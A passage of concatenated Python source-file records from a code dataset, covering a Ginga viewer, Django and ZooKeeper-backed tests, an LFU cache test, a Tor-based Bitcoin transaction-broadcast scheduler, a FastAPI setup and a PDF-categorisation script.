we\n choose a particular widget back end, but the advantage is that\n it works so long as the user has a working matplotlib.\n\n This implementation has the benefit of adding image overlays\n \"\"\"\n\n def _create_viewer(self, bind_prefs, viewer_prefs):\n\n # Ginga imports for matplotlib backend\n from ginga.mplw import ipg\n\n self.ginga_view = ipg.get_viewer()\n self.figure = self.ginga_view.figure\n\n self.figure.show()\n\n # create a canvas that we insert when doing imexam mode\n self.canvas = self.ginga_view.add_canvas()\n","sub_path":"imexam/ginga_viewer.py","file_name":"ginga_viewer.py","file_ext":"py","file_size_in_byte":25651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"75414964","text":"import pytz\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom unittest.mock import patch\n\n# Import module\nfrom backend.video_manager import *\n\n\nclass GetClipInfoTest(TestCase):\n\n def setUp(self) -> None:\n self.fid = create_root_folder(path='home/user/', name='test_folder')\n self.cid = create_clip(name='test_clip', fid=self.fid, video_format='tvf', latitude=Decimal('0.0'),\n longitude=Decimal('0.0'),\n start_time=timezone.datetime(2020, 1, 17, tzinfo=pytz.timezone(settings.TIME_ZONE)),\n end_time=timezone.datetime(2020, 1, 18, tzinfo=pytz.timezone(settings.TIME_ZONE)),\n width=256, height=240, frame_rate=42)\n\n @patch('backend.video_manager.os_aware', side_effect=lambda x: x)\n def test_basic(self, mock_os_aware):\n \"\"\"\n Makes a simple call.\n \"\"\"\n code, res = get_clip_info(data={CLIP_ID: self.cid})\n self.assertEqual(code, 200)\n self.assertEqual(res, {'id': 1, 'name': 'test_clip', 'video_format': 'tvf',\n 'start_time': '2020-01-17T00:00:00+01:00',\n 'end_time': '2020-01-18T00:00:00+01:00', 'resolution': 1,\n 'frame_rate': 42.0, 'folder': 1, 'camera': 1,\n 'file_path': 'home/user/test_folder/test_clip.tvf'})\n\n\nclass GetCamerasTest(TestCase):\n\n def setUp(self) -> None:\n \"\"\"\n Create cameras and a project.\n \"\"\"\n self.pid = create_project(name=\"test_project\")\n self.lat = Decimal(value=\"13.37\")\n self.lon = 
Decimal(value=\"0.42\")\n self.st = timezone.datetime(2020, 1, 17, tzinfo=pytz.timezone(settings.TIME_ZONE))\n self.et = timezone.datetime(2020, 1, 18, tzinfo=pytz.timezone(settings.TIME_ZONE))\n self.rid = create_root_folder(path=\"/home/user/\", name=\"test_folder\")\n self.sid = create_subfolder(parent_fid=self.rid, name=\"test_subfolder\")\n create_clip(fid=self.rid, name=\"test_clip1\", video_format=\"tvf\", start_time=self.st,\n end_time=self.et, latitude=self.lat, longitude=self.lon, width=256, height=240,\n frame_rate=42.0)\n create_clip(fid=self.sid, name=\"test_clip2\", video_format=\"tvf\", start_time=self.st,\n end_time=self.et, latitude=self.lat, longitude=self.lon, width=256, height=240,\n frame_rate=42.0)\n create_clip(fid=self.sid, name=\"test_clip3\", video_format=\"tvf\", start_time=self.st,\n end_time=self.et, latitude=self.lon, longitude=self.lat, width=256, height=240,\n frame_rate=42.0)\n add_folder_to_project(fid=self.rid, pid=self.pid)\n\n def test_basic(self):\n \"\"\"\n Makes a simple call.\n \"\"\"\n code, res = get_cameras(data={PROJECT_ID: self.pid})\n self.assertEqual(code, 200)\n self.assertEqual(len(res[CAMERAS]), 2)\n\n def test_non_existing_project(self):\n \"\"\"\n Test with a project id that doesn't exist.\n \"\"\"\n code, res = get_cameras(data={PROJECT_ID: 42})\n self.assertEqual(code, 204)\n self.assertEqual(res, {})\n","sub_path":"backend/test/test_integration/test_video_manager.py","file_name":"test_video_manager.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"296796412","text":"from actions.action_base import ActionBase\n\n\nclass RegretAction(ActionBase):\n def __init__(self):\n super().__init__(name=\"REGRET\",\n keywords=[\"i'?ll cry\", \"i'?m crying\", 'that hurts?',\n 'sad now', \"i'?m sad\"],\n answers=[\"i'm sorry\", 'soz', \"i didn't mean it\",\n 'okay, i am sorry', 'soz man'])\n","sub_path":"src/actions/custom/regret/regret.py","file_name":"regret.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"652085421","text":"# txCast by 6102bitcoin\n# Schedule randomised Bitcoin transaction broadcasting to break timing analysis\n\nimport requests\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom stem import Signal\nfrom stem.control import Controller\nimport secrets\n\npassword = \"test\" # Change this to your tor password\n\ntx_list = []\ntime_list = []\nnext_broadcast_time = \"\"\n\n\ndef get_current_ip():\n session = requests.session()\n\n # TO Request URL with SOCKS over TOR\n session.proxies = {}\n session.proxies['http']='socks5h://localhost:9050'\n session.proxies['https']='socks5h://localhost:9050'\n\n try:\n ip = session.get('http://httpbin.org/ip').text\n ip = ip.partition('\\\"origin\\\": \\\"')[2]\n ip = ip.rpartition('\\\"')[0] # Get only IP\n except Exception as e:\n print(str(e))\n else:\n return ip\n\n\ndef renew_tor_ip():\n with Controller.from_port(port=9051) as controller:\n controller.authenticate(password=password)\n controller.signal(Signal.NEWNYM)\n time.sleep(secrets.SystemRandom().randint(15, 30)) # Ensure new IP used\n\n\ndef fuzz(exact_value, lower_limit_fraction, upper_limit_fraction):\n lower_limit = int(exact_value * lower_limit_fraction)\n upper_limit = int(exact_value * upper_limit_fraction)\n fuzzed_value = exact_value + secrets.SystemRandom().randint(lower_limit, upper_limit)\n return 
fuzzed_value\n\n\ndef build_lists():\n # Create randomly sorted list of transactions to broadcast:\n finished = False\n while not finished:\n tx_next = input('Enter Next Signed Transaction (Type X To END): ')\n if tx_next == \"X\" or tx_next == \"x\":\n finished = True\n print(\"Number of Signed Transactions Entered: \" + str(len(tx_list)))\n else:\n tx_list.append(tx_next)\n secrets.SystemRandom().shuffle(tx_list)\n\n # Create ordered random times at which to broadcast:\n start = datetime.now()\n min_delay = timedelta(minutes=2)\n min_time = start + min_delay\n\n user_input_minutes = int(input('Minutes: '))\n user_input_hours = int(input('Hours: '))\n user_input_days = int(input('Days: '))\n\n max_delay = timedelta(minutes=user_input_minutes, hours=user_input_hours, days=user_input_days)\n max_time = min_time + max_delay\n\n number_of_times = len(tx_list)\n max_duration = max_time - min_time\n\n for i in range(0, number_of_times):\n random_time = secrets.SystemRandom().uniform(0, 1) * max_duration\n time_list.append(min_time + random_time)\n\n time_list.sort()\n\n # Print list of transactions & target broadcast times\n for i in range(0, len(tx_list)):\n print(\"Time: \" + str(time_list[i]) + \" | tx: \" + str(tx_list[i]))\n\n return\n\n\ndef push_tx(payload):\n requests.post('http://explorerzydxu5ecjrkwceayqybizmpjjznk5izmitf2modhcusuqlid.onion/testnet/api/tx', data=payload) # or use 'https://blockstream.info/testnet/api/tx'\n print(\"############################# SENDING TRANSACTION #############################\")\n print(\"Data Sent: \" + str(payload))\n print(\"IP Address Used: \" + str(get_current_ip()))\n\n\ndef process_tx(i):\n global next_broadcast_time\n\n renew_tor_ip() # Renew tor IP address\n\n # Set broadcast values\n next_broadcast_tx = tx_list[i]\n next_broadcast_time = time_list[i]\n\n current_time = datetime.now()\n\n if current_time > next_broadcast_time:\n time_remaining = next_broadcast_time - next_broadcast_time\n else:\n time_remaining = next_broadcast_time - current_time\n\n time.sleep(time_remaining.total_seconds())\n push_tx(next_broadcast_tx)\n push_time = datetime.now()\n\n return push_time\n\n\ndef process_all():\n for i in range(0, len(tx_list)):\n print(\"\")\n print(\"Transaction \" + str(i+1) + \" broadcast at \" + str(process_tx(i)))\n print(str(len(tx_list)-i-1) + \" Transactions Remaining\")\n\n\ndef main():\n build_lists()\n process_all()\n print(\"\")\n print(\"############################# TXCAST COMPLETE #############################\")\n\nmain()\n","sub_path":"Python/txCast.py","file_name":"txCast.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"361050296","text":"test_limit = 400\nlower_bound = 150\n\nlimit = 80000\ntriangle_array = []\npent_array = []\nhex_array = []\n\ndef is_triangle(n):\n for x in range(lower_bound,test_limit):\n triangle_array.append((x/2)*(x+1))\n return n in triangle_array\n\ndef is_pent(n):\n for y in range(lower_bound,test_limit):\n pent_array.append((y/2)*((3*y)-1))\n return n in pent_array\n\ndef is_hex(n):\n for z in range(lower_bound,test_limit):\n hex_array.append(z*((2*z)-1))\n return n in hex_array\n\nfor x in range (40000, limit):\n if is_pent(x) and is_hex(x):\n print(x)","sub_path":"Euler_45.py","file_name":"Euler_45.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"338799186","text":"'''\nCopyright (C) 2017 Black 
Duck Software, Inc.\nhttp://www.blackducksoftware.com/\n\n\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements. See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership. The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. See the License for the\nspecific language governing permissions and limitations\nunder the License.\n'''\nimport sys\nsys.path.append('../src/lib')\nimport blackduck_software as bds\n\nfrom proboscis.asserts import assert_equal\nfrom proboscis import test\n\n@test\nclass TestTransformApiEndpoint(object):\n \"\"\"Confirm that blackduck_software.transformApiEndpoint works correctly.\"\"\"\n \n global expected\n expected = 'test.endpoint.com'\n \n @test\n def testWithPrefixHttp(self):\n prefix = 'http://'\n actual = bds.transform_api_endpoint(str(prefix + expected))\n assert_equal(actual, expected, 'Transform incorrect when prefix is \"' + prefix + '\"')\n \n @test \n def testWithPrefixHttps(self):\n prefix = 'https://'\n actual = bds.transform_api_endpoint(str(prefix + expected))\n assert_equal(actual, expected, 'Transform incorrect when prefix is \"' + prefix + '\"')\n \n @test \n def testWithNoPrefix(self):\n actual = bds.transform_api_endpoint(expected)\n assert_equal(actual, expected, 'Transform incorrect when no prefix')","sub_path":"black-duck-decorator/test/lib/blackduck_software_test.py","file_name":"blackduck_software_test.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"231017774","text":"#playing with turtle graphics\n\nimport turtle\n\n#create window\nloadwindow = turtle.Screen()\nturtle.colormode(255)\n\n#turn off draw mode\nturtle.speed(0)\n\nsides = 6\n\n#create and run turle\ndef shape(size, sides):\n for i in range(sides):\n turtle.forward(size)\n turtle.left(360/sides)\n\nfor i in range(100):\n shape(i, i)\n turtle.left(i)\n\n\n \n# wait for user to end \n","sub_path":"Sanaz/Turtle/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"627454890","text":"\"\"\"Test of theInterUSS Platform Data Node storage API server.\n\n\nCopyright 2018 Google LLC\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport threading\nimport unittest\nfrom dateutil import parser\nfrom kazoo.handlers.threading import KazooTimeoutError\n\nimport storage_interface\nZK_TEST_CONNECTION_STRING = '35.224.64.48:2181,35.188.14.39:2181,35.224.180.72:2181'\nPARALLEL_WORKERS = 
10\n\n\nclass InterUSSStorageInterfaceTestCase(unittest.TestCase):\n\n def setUp(self):\n # IMPORTANT: Puts us in a test data location\n self.mm = storage_interface.USSMetadataManager(\n ZK_TEST_CONNECTION_STRING, testgroupid='InterUSSStorageInterfaceTest')\n\n def tearDown(self):\n # IMPORTANT: Clean out your test data when you are done\n self.mm.delete_testdata()\n self.mm = None\n\n def testBadConnectionStrings(self):\n with self.assertRaises(ValueError):\n storage_interface.USSMetadataManager(\n 'terrible:connection:1459231232133_string-#$%@',\n testgroupid='InterUSSStorageInterfaceTest')\n with self.assertRaises(ValueError):\n storage_interface.USSMetadataManager(\n '__init__%password%', testgroupid='InterUSSStorageInterfaceTest')\n with self.assertRaises(ValueError):\n storage_interface.USSMetadataManager(\n '\\'printf();\\'', testgroupid='InterUSSStorageInterfaceTest')\n with self.assertRaises(KazooTimeoutError):\n storage_interface.USSMetadataManager(\n '123456789101112', testgroupid='InterUSSStorageInterfaceTest')\n with self.assertRaises(KazooTimeoutError):\n storage_interface.USSMetadataManager(\n 'google.com:2424,gmail.com:14566',\n testgroupid='InterUSSStorageInterfaceTest')\n\n def testGetCellNegativeCases(self):\n assert self.mm.get(2, 1, 2**2)['status'] == 'fail'\n # x, y, z are ints\n assert self.mm.get(1, '1a', 1)['status'] == 'fail'\n assert self.mm.get(1, 1, 'aa')['status'] == 'fail'\n assert self.mm.get(None, 1, 1)['status'] == 'fail'\n # x and y tiles max are 2^zoom - 1\n assert self.mm.get(1, 2, 1)['status'] == 'fail'\n assert self.mm.get(2, 5478118, 1)['status'] == 'fail'\n assert self.mm.get(2, 2**2, 1)['status'] == 'fail'\n assert self.mm.get(12, 2**12, 1)['status'] == 'fail'\n assert self.mm.get(1, 17, 1)['status'] == 'fail'\n assert self.mm.get(1, 1, 11)['status'] == 'fail'\n assert self.mm.get(9, 2**8, 2**11)['status'] == 'fail'\n\n def testGetCellPositiveEmptyCases(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # simple 1,1,1\n r = self.mm.get(1, 1, 1)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n # zero case\n r = self.mm.get(0, 0, 0)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n r = self.mm.get(11, 0, 5)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n # limit in the y direction\n r = self.mm.get(10, 1, 2**10 - 1)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n # limit in the x direction\n r = self.mm.get(18, 2**18 - 1, 2**10 - 1)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n # Make sure everything is clean\n self.mm.delete_testdata()\n\n def testPositiveGetSetDeleteCycle(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 2,1,1 get empty\n g = self.mm.get(2, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 0\n assert not g['data']['operators']\n # simple set with basic values\n s = self.mm.set(2, 1, 1, g['sync_token'], 'uss', 'uss-scope', 'GUTMA',\n 'https://g.co/flight', '2018-01-01T00:00:00+00:00',\n '2018-01-01T01:00:00+00:00')\n assert s['status'] == 'success'\n assert s['data']['version'] == 1\n assert len(s['data']['operators']) == 1\n o = s['data']['operators'][0]\n assert o['uss'] == 'uss'\n assert o['operation_endpoint'] == 'https://g.co/flight'\n assert o['operation_format'] == 'GUTMA'\n assert o['version'] == 1\n assert o['minimum_operation_timestamp'] == '2018-01-01T00:00:00+00:00'\n assert o['maximum_operation_timestamp'] == '2018-01-01T01:00:00+00:00'\n # 
simple delete\n d = self.mm.delete(2, 1, 1, 'uss')\n assert d['status'] == 'success'\n assert d['data']['version'] == 2\n assert not d['data']['operators']\n # simple confirm get is empty\n g = self.mm.get(2, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 2\n assert not g['data']['operators']\n # Make sure everything is clean\n self.mm.delete_testdata()\n\n def testSetCellWithOutdatedsync_token(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 3,1,1 get empty\n g = self.mm.get(3, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 0\n assert not g['data']['operators']\n # simple set with basic values\n s = self.mm.set(3, 1, 1, g['sync_token'], 'uss1', 'uss1-scope', 'GUTMA',\n 'https://g.co/flight', '2018-01-01T00:00:00+00:00',\n '2018-01-01T01:00:00+00:00')\n assert s['status'] == 'success'\n assert s['data']['version'] == 1\n assert len(s['data']['operators']) == 1\n # now try to do a set with the original sync token\n s = self.mm.set(3, 1, 1, g['sync_token'], 'uss2', 'uss2-scope', 'GUTMA',\n 'https://h.com/f/3/1/1', '2018-01-01T11:00:00+00:00',\n '2018-01-01T12:00:00+00:00')\n assert s['status'] == 'fail'\n # confirm version is still the first write\n g = self.mm.get(3, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 1\n assert len(g['data']['operators']) == 1\n # Make sure everything is clean\n self.mm.delete_testdata()\n\n def testSetCellsInParallelWithSamesync_token(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 4,1,1 get empty\n g = self.mm.get(4, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 0\n assert not g['data']['operators']\n threads = []\n for i in range(PARALLEL_WORKERS):\n t = threading.Thread(\n target=self.SetCellWorker, args=(\n i,\n g['sync_token'],\n ))\n threads.append(t)\n t.start()\n t.join()\n # confirm there is only one update\n g = self.mm.get(4, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 1\n assert len(g['data']['operators']) == 1\n # Make sure everything is clean\n self.mm.delete_testdata()\n\n def SetCellWorker(self, num, sync_token):\n self.mm.set(4, 1, 1, sync_token, 'uss' + str(num), 'uss-scope' + str(num),\n 'GUTMA', 'https://' + str(num) + '.io/flight',\n '2018-01-01T00:00:00+00:00', '2018-01-01T01:00:00+00:00')\n return\n\n def testSetCellsWithInvalidTimestamps(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 5,1,1 get empty\n s = self.mm.get(5, 1, 1)\n token = s['sync_token']\n testsets = [('Not a valid timestamp', '215664892128621657566'),\n ('2018-01-01H00:00:00+00:00', '2019-01-01!00:00:00'),\n ('2018-01-01T00:00:00+00:00', '215664892128621657566')]\n for test in testsets:\n s = self.mm.set(5, 1, 1, token, 'uss', 'uss-scope', 'GUTMA',\n 'https://g.co/flight', test[0], test[1])\n assert s['status'] == 'fail'\n # Make sure everything is clean\n self.mm.delete_testdata()\n return\n\n def testSetCellsWithValidTimestamps(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 5,1,1 get empty\n s = self.mm.get(5, 1, 1)\n token = s['sync_token']\n testsets = [('2018-01-01T00:00+00', '2019-01-01T01:02:03.12345+00:00'),\n ('2018-01-01T00:00:00', '2019-01-01T01:02:03.12345'),\n ('2018-02-28T23:59:59-07:00', '2018-03-02T23:59:59+08:00'),\n ('2018-01-01T00:00:00', '2019-01-01')\n ]\n for test in testsets:\n s = self.mm.set(5, 1, 1, token, 'uss', 'uss-scope', 'GUTMA',\n 'https://g.co/flight', test[0], test[1])\n token = s['sync_token']\n assert 
s['status'] == 'success'\n o = s['data']['operators'][0]\n assert parser.parse(test[0]) == parser.parse(\n o['minimum_operation_timestamp'])\n assert parser.parse(test[1]) == parser.parse(\n o['maximum_operation_timestamp'])\n # Make sure everything is clean\n self.mm.delete_testdata()\n return\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"datanode/src/storage_interface_test.py","file_name":"storage_interface_test.py","file_ext":"py","file_size_in_byte":9012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"418170583","text":"from random import SystemRandom\n\nimport pytest\n\nfrom cacheout import LFUCache\n\n\nparametrize = pytest.mark.parametrize\nrandom = SystemRandom()\n\n\n@pytest.fixture\ndef cache():\n _cache = LFUCache(maxsize=5)\n return _cache\n\n\ndef assert_keys_evicted_in_order(cache, keys):\n \"\"\"Assert that cache keys are evicted in the same order as `keys`.\"\"\"\n keys = keys.copy()\n for n in range(cache.maxsize, cache.maxsize * 2):\n cache.set(n, n)\n assert cache.full()\n assert keys.pop(0) not in cache\n\n for key in keys:\n assert key in cache\n\n\ndef test_lfu_eviction(cache):\n \"\"\"Test that LFUCache evicts least frequently used set entries first.\"\"\"\n key_counts = [(\"a\", 4), (\"b\", 3), (\"c\", 5), (\"d\", 1), (\"e\", 2)]\n\n for key, count in key_counts:\n cache.set(key, key)\n\n for _ in range(count):\n cache.get(key)\n\n sorted_key_counts = sorted(key_counts, key=lambda kc: kc[1])\n eviction_order = [kc[0] for kc in sorted_key_counts]\n max_access_count = max([kc[1] for kc in sorted_key_counts])\n\n for n in range(len(key_counts)):\n cache.set(n, n)\n\n for _ in range(max_access_count + 1):\n cache.get(n)\n\n assert cache.full()\n assert eviction_order[n] not in cache\n\n for key in eviction_order[(n + 1) :]:\n assert key in cache\n\n\ndef test_lfu_get(cache):\n \"\"\"Test that LFUCache.get() returns cached value.\"\"\"\n for key, value in cache.items():\n assert cache.get(key) == value\n\n\ndef test_lfu_clear(cache):\n \"\"\"Test that LFUCache.clear() resets access counts.\"\"\"\n cache.maxsize = 2\n\n cache.set(1, 1)\n cache.set(2, 2)\n\n for _ in range(5):\n cache.get(1)\n\n cache.set(3, 3)\n\n assert 2 not in cache\n\n cache.clear()\n assert len(cache) == 0\n\n cache.set(1, 1)\n cache.set(2, 2)\n\n cache.get(2)\n cache.set(3, 3)\n\n assert 1 not in cache\n","sub_path":"tests/test_lfu.py","file_name":"test_lfu.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"408838667","text":"from fastapi import FastAPI\nfrom starlette.middleware.cors import CORSMiddleware\nfrom .config import settings\nfrom .api.api_v1.api import api_router\n\n\napp = FastAPI(\n title='BasicAPI',\n description='This is just a starter project',\n version='1.0.0',\n docs_url='/docs',\n redoc_url='/'\n)\n\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\n\napp.include_router(api_router, prefix=settings.API_V1_STR)\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"398313529","text":"from django.shortcuts import render\nfrom . 
import models\n# Create your views here.\n\n\ndef index(request):\n\tcandidate = models.Resume.objects.get(id__exact = 1)\n\tqualifications = models.Qualification.objects.all().filter(candidate__id__exact = 1)\n\tprojects = models.Project.objects.all().filter(candidate__id__exact = 1)\n\tprojects_list=[]\n\tfor pro in projects:\n\t\tprojects_dict={}\n\t\tprojects_dict['name']=pro.name\n\t\tprojects_dict['link']=pro.link\n\t\tprojects_dict['description']=pro.description\n\t\tprojects_dict['image']=pro.image.url\n\t\tprojects_list.append(projects_dict)\n\n\n\texpertise = models.Expertise.objects.all().filter(candidate__id__exact = 1)\n\n\treturn render(request, 'index.html', {\t'candidate':candidate, \n\t\t\t\t\t\t\t\t\t\t\t'qualifications':qualifications, \n\t\t\t\t\t\t\t\t\t\t\t'expertise':expertise, \n\t\t\t\t\t\t\t\t\t\t\t'projects':projects, \n\t\t\t\t\t\t\t\t\t\t\t'projects_count':range((projects.count()//3)),\n\t\t\t\t\t\t\t\t\t\t\t'projects_residue':range((projects.count()%3)),\n\t\t\t\t\t\t\t\t\t\t\t'projects_list':projects_list, \n\t\t\t\t\t\t\t\t\t\t\t'three':range(3), \n\t\t\t\t\t\t\t\t\t\t})\n\n","sub_path":"credentials/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"62634351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 17 10:47:06 2020\n\n@author: singvibu\n\"\"\"\nimport pandas as pd\nimport nltk\n\nfrom IPython.core.interactiveshell import InteractiveShell\nInteractiveShell.ast_node_interactivity = \"all\"\n# Importing libraries \nimport nltk \nimport re \nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer \nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nimport pandas as pd \n\nfrom pathlib import Path\n\n\nimport PyPDF2\nfrom pathlib import Path\n\n\n \ndef check_topic_present(topic, text):\n \"\"\"\n This basic function attempts to check if any of the keywords of a \n particular topic are present in the the description line of the PDF File. \n \n Parameters\n ----------\n topic: contains a list of keywords present in a topic\n text: contains the textual description line for the PDF\n \n Returns\n ----------\n Binary_Value:\n It returs binary value 1 or 0, depecding on if there is a keyword that \n is present in the textual description line for the PDF. \n \n \"\"\"\n \n for key in topic:\n if key in text:\n return 1\n return 0\n \ndef remove_string_special_characters(s): \n \"\"\"\n This basic function attempts to replace special characters, and multiple \n white spaces with a single pscae. It also removes all leading and trailing \n characters from the string. Furthermore, it converts the string into lower \n case characters. 
thus making the input string into easy to process string.\n \n Parameters\n ----------\n s: the input string \n \n Returns\n ----------\n Easy to process string:\n It reurns easy to process string, which means the string does not have \n unnecessary white spaces and all characters are in lower case.\n \n \"\"\"\n \n # removes special characters with ' ' \n stripped = re.sub('[^a-zA-z\\s]', '', s) \n stripped = re.sub('_', '', stripped) \n \n # Change any white space to one space \n stripped = re.sub('\\s+', ' ', stripped) \n \n # Remove start and end white spaces \n stripped = stripped.strip() \n return stripped.lower() \n \ndef pdf_categorize(path, Index0):\n \"\"\"\n This method attempts to categorize all the PDF files from the list of PDFs \n into one more ESA categories. \n \n Based on the contents of a ESA files, we were able to identify the top 10 \n ESA categories. We performed frequency analysis of the keywords from the \n PDF contents, thereafter we came up with top 10 ESA categories. \n \n As there might be a single PDF File covering more than one ESA category, \n hence, we get an arror of categories for each PDF File. PDF files which do \n not match to any of these 10 categories are classifies as 'other'.\n \n Parameters\n ----------\n path: path of the root folder in string format\n This path will be used to find the folder location where the scraped \n pdf files are going to be saved\n Index0: Dataframe with the DataIDs of the PDF and their downloadable links \n Data_ID: It is the unique ID of the PDF file which will be used as the \n name of the PDF downloaded\n esa_download_link: URL addresses stored as a list of string\n a list of the pdf URLs so that the respepctive files could be \n downloaded\n \n Returns\n ----------\n Index1:\n This returns a dataframe similar to Index0 with an additional coloumn\n 'Topics', indicating the ESA categories which the code has identified \n for the PDF file.\n \n \"\"\"\n \n #Defining 10 categories based on the keywords chosen \n land1 = ['soil', 'land', 'ground', 'terrain', 'topography', 'ecozones', 'terrain']\n air2 = ['air', 'emission', 'ghg', 'gas', 'greenhouse', 'weather' , 'climate', 'meteorological', 'atmospher']\n water3 = ['water', 'fish', 'wetlands', 'navigation', 'marine', 'aqua', 'drain', 'river']\n wildlife4 = ['wild', 'fish', 'poisson', 'species', 'habitat', 'acoustic', 'life', 'biophysical']\n vegetation5 = ['vegetation', 'wetlands', 'plant', 'soil']\n human6 = ['human', 'socio', 'social', 'economic', 'economy' 'occupancy', 'heritage', 'health', 'aesthetics', \n 'employment', 'acoustic', 'traditional', 'navigation', 'resource', 'infrastructure', 'noise', 'rapport']\n alignment_sheet7 = ['alignment', 'sheet']\n tech8 = ['technical', 'tech']\n traditional_knowledge9 = ['first', 'nation', 'traditional', 'engage']\n epp10 = ['environment protection', 'environmental protection' , 'epp']\n \n topics = []\n for index, row in Index0.iterrows():\n # Extracting the PDF data and the PDF name\n # PDF name might have useful data about the contents of the PDF\n line = str(row['ESA Section(s)']) + str(row['File Name'])\n \n # unnecessary white spacxes is removed and text converted to lower case \n line = remove_string_special_characters(line).lower()\n line_topics = []\n topic_found = 0\n \n # Categorising the PDFs into 10 ESA categories based on keywords present \n if check_topic_present(land1, line) == 1:\n line_topics.append('Land')\n topic_found = 1\n \n if check_topic_present(air2, line) == 1:\n line_topics.append('Air')\n topic_found 
= 1\n \n if check_topic_present(water3, line) == 1:\n line_topics.append('Water')\n topic_found = 1\n \n if check_topic_present(wildlife4, line) == 1:\n line_topics.append('Wildlife')\n topic_found = 1\n \n if check_topic_present(vegetation5, line) == 1:\n line_topics.append('Vegetation')\n topic_found = 1\n \n if check_topic_present(human6, line) == 1:\n line_topics.append('Human')\n topic_found = 1\n \n if check_topic_present(alignment_sheet7, line) == 1:\n line_topics.append('Alignment Sheet')\n topic_found = 1\n \n if check_topic_present(tech8, line) == 1:\n line_topics.append('Technology')\n topic_found = 1\n\n if check_topic_present(traditional_knowledge9, line) == 1:\n line_topics.append('Traditional Knowledge')\n topic_found = 1\n \n if check_topic_present(epp10, line) == 1:\n line_topics.append('Environment Protection Plan')\n topic_found = 1\n \n if topic_found == 0:\n line_topics.append('Other')\n \n # The detected topics for each PDF are appended to the list \n topics.append(line_topics)\n \n # New Index1 has all the columns of Index0 plus one additional column\n Index1 = Index0\n Index1['Topics'] = topics\n return Index1\n\n\ndef pdf_size(path, Index0):\n \"\"\"\n This method attempts to identify the size of each of the PDF files (in \n bytes) from the list of files present in Index0. Files which fail to open, \n or fail in any other dependent step, will show a file size of 0 bytes. \n \n Parameters\n ----------\n path: path of the root folder in string format\n This path will be used to find the folder location where the scraped \n pdf files are going to be saved\n Index0: Dataframe with the DataIDs of the PDF and their downloadable links \n Data_ID: It is the unique ID of the PDF file which will be used as the \n name of the PDF downloaded\n esa_download_link: URL addresses stored as a list of string\n a list of the pdf URLs so that the respective files could be \n downloaded\n \n Returns\n ----------\n Index1:\n This returns a dataframe similar to Index0 with an additional column\n 'PDF Size (bytes)', indicating the size of the PDF file in bytes. \n \n \"\"\"\n sizes = []\n \n # Iterate through each row of the Dataframe\n for index, row in Index0.iterrows():\n try:\n pdf_path = path + \"\\\\Data_Files\\\\PDFs\\\\\" + str(row['Data ID']) + '.pdf'\n file = Path(pdf_path)\n size = file.stat().st_size\n 